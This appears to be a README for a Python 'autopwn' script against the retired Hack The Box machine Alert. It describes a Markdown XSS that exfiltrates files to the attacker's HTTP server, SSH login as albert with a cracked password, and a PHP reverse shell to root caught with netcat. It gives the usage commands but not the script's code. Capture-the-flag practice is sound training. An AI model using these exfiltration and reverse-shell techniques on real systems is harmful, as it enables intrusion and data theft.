This script fully automates the exploitation of the retired Hack The Box machine Alert, including both initial intrusion and privilege escalation to root. It leverages a Markdown-based XSS, a local HTTP server, and a PHP reverse shell.
The script operates in two attack phases, selectable via --type-attack:
intrusion: Uploads a malicious.mdfile containing JavaScript to extract files from the target via XSS.privesc: Uses valid SSH credentials for useralbert, deploys a maliciousshell.php, and spawns a reverse shell as root.
- Python 3.x
sshpassandnetcat(nc) installed- HTB VPN connection active
- Known password for
albert(retrieved by cracking a hash)
Starts an HTTP server to receive exfiltrated data from the vulnerable application:
python3 autopwn.py --type-attack intrusion --ip 10.10.14.5 --port 8000Arguments:
--ipYour VPN IP to receive the HTTP request--portListening port for HTTP server (default: 8000)--urlTarget base URL (default: http://alert.htb)
Once you have cracked albert's password, use this phase to gain a root shell:
python3 autopwn.py --type-attack privesc --ip 10.10.14.5 --ssh-pass manchesterunitedAdditional Arguments:
--ssh-passPassword for albert (required for privesc)--ip-victimVictim IP address (default: 10.10.11.44)
The script will upload and execute shell.php over SSH and open a listener for the root reverse shell.
# Step 1: XSS intrusion and file exfiltration
python3 autopwn.py --type-attack intrusion --ip 10.10.14.5 --port 8000
# Step 2: After cracking albert’s hash...
python3 autopwn.py --type-attack privesc --ip 10.10.14.5 --ssh-pass manchesterunited✅ Clean menu with per-phase argument validation
✅ Dynamic JS and PHP payload generation (base64-encoded)
✅ SSH automation with sshpass (no user interaction)
✅ Reverse shell with nc listener spawned from Python
✅ Optional port forwarding functionality built-in (not used in default setup)